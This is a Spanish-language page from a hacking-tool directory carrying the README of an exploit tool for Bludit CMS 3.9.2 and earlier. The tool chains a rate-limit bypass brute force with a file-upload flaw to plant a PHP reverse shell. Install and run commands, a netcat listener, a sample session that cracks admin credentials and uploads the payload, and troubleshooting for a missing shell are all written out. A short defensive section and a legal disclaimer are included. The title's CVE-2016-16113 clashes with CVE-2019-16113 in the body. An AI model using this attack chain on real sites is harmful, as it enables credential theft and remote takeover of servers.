Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2016-16113-POC — cve-2016-16113 | Kitploit
Herramientas/GitHubGitHub/d3vn0mi/cve-2016-16113-poc
Ataques de ContraseñasGeneración de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubd3vn0mi/cve-2016-16113-poc

CVE-2016-16113-POC

cve-2016-16113

Ver Repositorio
12hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Obtén RCE - Exploit de Bludit CMS

root@kitploit:~
     _ _____             ___            _ 
  __| |___ /_   ___ __  / _ \ _ __ ___ (_)
 / _` | |_ \ \ / / '_ \| | | | '_ ` _ \| |
| (_| |___) \ V /| | | | |_| | | | | | | |
 \__,_|____/ \_/ |_| |_|\___/|_| |_| |_|_|

Una herramienta de explotación automatizada que combina CVE-2019-17240 (bypass de autenticación) y CVE-2019-16113 (carga arbitraria de archivos) para lograr ejecución remota de código en instalaciones vulnerables de Bludit CMS.

⚠️ Aviso legal

SOLO PARA PRUEBAS DE SEGURIDAD AUTORIZADAS

Esta herramienta está destinada a profesionales de seguridad que realicen pruebas de penetración autorizadas e investigadores de seguridad que operen dentro de los límites legales. El acceso no autorizado a sistemas informáticos es ilegal según leyes como la Computer Fraud and Abuse Act (CFAA) en Estados Unidos y legislaciones similares en todo el mundo.

Al usar esta herramienta, aceptas:

  • Probar solo sistemas que poseas o para los que tengas permiso explícito por escrito
  • Cumplir con todas las leyes locales, estatales y federales aplicables
  • Aceptar la responsabilidad total de tus acciones

El autor no asume ninguna responsabilidad y no se hace responsable de ningún uso indebido o daño causado por esta herramienta.

📋 Descripción general

Este exploit automatiza el proceso de:

  1. Verificación de disponibilidad del objetivo
  2. Bypass de autenticación mediante fuerza bruta (aprovechando CVE-2019-17240)
  3. Subida de una shell reversa PHP maliciosa (explotando CVE-2019-16113)
  4. Establecimiento de una conexión de shell reversa

Detalles de las vulnerabilidades

  • CVE-2019-17240: Bypass de autenticación mediante una implementación incorrecta de limitación de tasa (se evita manipulando la cabecera X-Forwarded-For)
  • CVE-2019-16113: Vulnerabilidad de carga arbitraria de archivos que permite la ejecución de código PHP malicioso

Versiones afectadas: Bludit CMS versiones 3.9.2 e inferiores

🚀 Características

  • ✅ Verificación automatizada de disponibilidad del objetivo
  • ✅ Bypass de autenticación mediante fuerza bruta
  • ✅ Capacidad de enumeración de nombres de usuario
  • ✅ Fuerza bruta combinada de nombre de usuario + contraseña
  • ✅ Manejo automático de tokens CSRF
  • ✅ Generación de payload de shell reversa PHP
  • ✅ Subida de .htaccess para explotación mejorada
  • ✅ Verificación de conexión

📦 Requisitos

  • Python 3.6+
  • Paquetes Python necesarios:
    • requests

🔧 Instalación

root@kitploit:~
# Clonar el repositorio
git clone https://github.com/yourusername/get-rce.git
cd get-rce

# Instalar dependencias
pip install -r requirements.txt

requirements.txt:

root@kitploit:~
requests>=2.25.0

💻 Uso

Uso básico

root@kitploit:~
python3 get_rce.py

El script te solicitará:

  1. URL del objetivo (ej., https://target.com)
  2. Dirección IP de tu listener
  3. Puerto de tu listener
  4. Si deseas forzar el nombre de usuario
  5. Ubicaciones de las wordlists

Configurar tu listener

Antes de ejecutar el exploit, configura un listener con netcat:

root@kitploit:~
nc -lvnp 4444

Reemplaza 4444 con el puerto que elijas.

Ejemplo de sesión

root@kitploit:~
$ python3 get_rce.py

Enter target URL (i.e. https://target.com): http://10.10.10.191
[ ~ ] Enter listener's IP: 10.10.14.5
[ ~ ] Enter listener's port: 4444
[...] Checking if the target is live...
[ + ] The target is live! We are good to go...

[ ~ ] Should I bruteforce username? [Y/N]: N
[ ~ ] What username should I use? (leave this to use admin as username): 
[...] We are gonna default to 'admin' as username.

[ ~ ] Enter the location for password list: /usr/share/wordlists/rockyou.txt
[ * ] Tried: 123456
[ * ] Tried: password
[ * ] Tried: 12345678
...
[ + ] Creds found: admin:Password123
[ + ] Login succeed... We are good to go :)

[ + ] The payload XyZaBcDeFg.php has been uploaded...
[ + ] The payload .htaccess has been uploaded...
[...] Attempting to get a shell... @ http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php
[ + ] You should be getting a shell by now, if not open http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php

Modos de ataque

Modo 1: Nombre de usuario conocido + fuerza bruta de contraseña

root@kitploit:~
Should I bruteforce username? [Y/N]: N
What username should I use?: admin
Enter the location for password list: /path/to/passwords.txt

Modo 2: Fuerza bruta completa de credenciales

root@kitploit:~
Should I bruteforce username? [Y/N]: Y
Enter the location for username wordlist: /path/to/usernames.txt
Enter the location for password wordlist: /path/to/passwords.txt

📝 Wordlists recomendadas

  • SecLists: https://github.com/danielmiessler/SecLists

    • Nombres de usuario: SecLists/Usernames/Names/names.txt
    • Contraseñas: SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt
  • RockYou: /usr/share/wordlists/rockyou.txt (Kali Linux)

🔍 Cómo funciona

  1. Validación del objetivo: Verifica si el objetivo es accesible
  2. Bypass de autenticación:
    • Manipula la cabecera X-Forwarded-For para evitar la limitación de tasa
    • Realiza fuerza bruta de credenciales usando las wordlists proporcionadas
    • Maneja tokens CSRF automáticamente
  3. Explotación:
    • Sube una shell reversa PHP a /bl-content/tmp/
    • Sube un archivo .htaccess para asegurar la ejecución
    • Activa el payload para establecer la shell reversa
  4. Acceso a la shell: Se conecta de vuelta a tu listener

🛡️ Medidas defensivas

Si eres administrador de sistemas:

  • Actualiza inmediatamente a Bludit 3.9.3 o posterior
  • Implementa una limitación de tasa adecuada basada en sesión, no en IP
  • Valida todas las subidas de archivos (tipo, extensión, contenido)
  • Utiliza firewalls de aplicaciones web (WAF)
  • Monitorea el directorio /bl-content/tmp/ en busca de archivos sospechosos
  • Implementa políticas de contraseñas sólidas
  • Habilita mecanismos de bloqueo de cuentas

🐛 Solución de problemas

Problema: "El objetivo parece estar caído"

  • Verifica que la URL sea correcta e incluya el protocolo (http/https)
  • Comprueba tu conectividad de red
  • Asegúrate de que el objetivo esté ejecutando Bludit realmente

Problema: "Inicio de sesión fallido"

  • Verifica que las credenciales sean correctas
  • Prueba con una wordlist más completa
  • Comprueba si el objetivo tiene mecanismos de autenticación adicionales

Problema: "No se recibió la shell"

  • Verifica que tu listener esté funcionando
  • Revisa las reglas del cortafuegos en ambos lados
  • Asegúrate de que la IP y el puerto del listener sean correctos y accesibles

🔗 Referencias

  • Detalles de CVE-2019-17240
  • Detalles de CVE-2019-16113
  • Sitio web oficial de Bludit

👤 Autor

d3vn0mi

📄 Licencia

Este proyecto se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. Consulta el aviso legal al principio de este README.

🤝 Contribuciones

¡Las contribuciones, problemas y solicitudes de funciones son bienvenidas! No dudes en visitar la página de issues.

⭐ Agradecimientos

  • A la comunidad de investigación de seguridad por descubrir y documentar estas vulnerabilidades
  • Al equipo de Bludit por su rápida respuesta al parchear estos problemas
Descargar herramienta